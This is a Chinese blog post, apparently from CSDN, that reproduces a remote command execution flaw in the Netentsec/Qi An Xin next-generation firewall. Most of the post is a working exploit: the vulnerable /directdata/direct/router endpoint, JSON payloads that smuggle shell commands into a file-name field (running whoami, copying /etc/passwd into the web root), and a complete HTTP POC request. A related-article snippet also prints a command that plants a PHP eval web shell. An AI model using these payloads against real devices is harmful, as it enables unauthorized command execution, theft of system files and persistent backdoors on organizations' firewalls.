网康下一代防火墙RCE漏洞

最新推荐文章于 2024-03-12 21:00:21 发布
最新推荐文章于 2024-03-12 21:00:21 发布
阅读量996 收藏 1
点赞数 1
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maverickpig/article/details/117304505
版权

使用需知

由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。

一、漏洞描述

防火墙使用linux进行开发的,可以使用echo xxx >123.txt这样的方式写入文件。 当文件生成目录在网站根目录下就可以直接访问

二、漏洞影响

奇安信 网康下一代防火墙

三、漏洞复现

存在漏洞的路径为

	
POST /directdata/direct/router

命令执行

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

命令结果不回显,但可以看返回代码确认执行成功与否
[{“type”:“rpc”,“tid”:17,“action”:“SSLVPN_Resource”,“method”:“deleteImage”,“result”:{“success”:true}}]
看到带true字样就是命令执行成功。
注意这个是命令执行漏洞,所以不懂liunx命令的不要轻易尝试。
第二种测试方式

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/README.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问:

http://IP/README.txt

在这里插入图片描述

测试有四种payload,就是增删查改四种。

四、漏洞POC

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 178
 
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
maverickpig
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
路由器/防火墙相关漏洞:Gigafast/CompUSA router信息泄露及拒绝服务漏洞.pdf
10-09
路由器/防火墙相关漏洞:Gigafast/CompUSA router信息泄露及拒绝服务漏洞.pdf
漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
最新发布
weixin_52204925的博客
03-12 1041
由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤,导致输入的语句直接插入到数据库执行造成SQL注入,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
NTWRKCHATNEW.rar_ICQ/即时通讯_Visual_Basic_
08-12
In development... Currently a chat room to work over a router. Soon to be wireless control.
dva.zip_Dva封装_dva_dva/router_react-dva_redux 封装
09-19
react + redux 最佳实践的封装方案,简化使用 redux 和 redux-saga 时很多繁杂的操作
网康防火墙漏洞代码分析
duan哥哥的博客
05-31 820
poc分析 POST /directdata/direct/router HTTP/1.1 Host: X.X.X.X { "action": "SSLVPN_Resource", "method": "deleteImage", "data":[{ "data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"] }], "ty
网康科技-下一代防火墙存在任意命令执行漏洞【附POC】
Liyu_6618的博客
02-07 319
网康科技-下一代防火墙存在任意命令执行漏洞【附POC】
CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞复现
热爱学习,喜欢折腾!
10-24 992
Sophos是提供“安全技术”的世界级领导者,为商业机构、教育机构和政府机构提供防御病毒、间谍软件和广告等垃圾邮件的完整解决方案,使这些客户免遭病毒和垃圾邮件的侵害。Sophos Firewall爆出了一个认证绕过漏洞CVE-2022-1040。
2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节
weixin_45032957的博客
04-21 847
POC为POST 类型的HTTP 请求报文 POST /directdata/direct/router HTTP/1.1 Host: x.x.x.x Connection: close Cache-Control: max-age=0 sec-ch-ua: “Google Chrome”;v=“89”, “Chromium”;v=“89”, “;Not A Brand”;v=“99” sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent:
网康NGFW下一代防火墙远程命令执行漏洞复现
qq_44005305的博客
02-24 598
2021HW期间,北京网康科技有限公司网康NGFW下一代防火墙被爆出远程命令执行漏洞。CNVD上还没查到漏洞编号,应该是CNVD还未公开该漏洞。但是网上已有人复现和漏洞分析的文章。网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。但该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。
漏洞复现-网康(奇安信)NGFW下一代防火墙远程命令执行
qq_17754023的博客
06-23 1045
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
网康防火墙前台RCE PoC及漏洞分析
weixin_50464560的博客
09-30 1642
漏洞描述 网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。 这个洞是今年hvv期间爆出来的,危害很高,因此甲方baba要求我做一下分析的工作,好家伙,开局一个漏洞名称,报告内容全靠编,安排。 在网上找一条...
网康NS-NGFW防火墙远程RCE 漏洞复现
00勇士王子的博客
04-11 1390
漏洞点在 /directdata/direct/router 先访问ip加上上面的路径 具体包如下: GET /directdata/direct/router HTTP/1.1 Host: 目标ip地址 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9.
网康科技-下一代防火墙 rce
xxx9686的博客
09-25 399
【代码】网康科技-下一代防火墙 rce
近两年常用的RCE漏洞收集
Websec
04-11 5349
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
pikachu靶场RCE漏洞
10-13
这是一个关于Pikachu靶场的RCE漏洞的问题。Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用该漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以参考以下步骤来修复该漏洞: 1. 确认漏洞是否存在:可以通过手动或自动化的方式对系统进行扫描,以确认是否存在该漏洞。 2. 更新相关软件:如果发现存在漏洞,应及时更新相关软件版本,以修复漏洞。 3. 配置安全策略:可以通过配置安全策略来限制攻击者对系统的访问权限,从而减少漏洞被利用的风险。 4. 加强监控:可以通过加强监控来及时发现并阻止攻击行为,从而保护系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值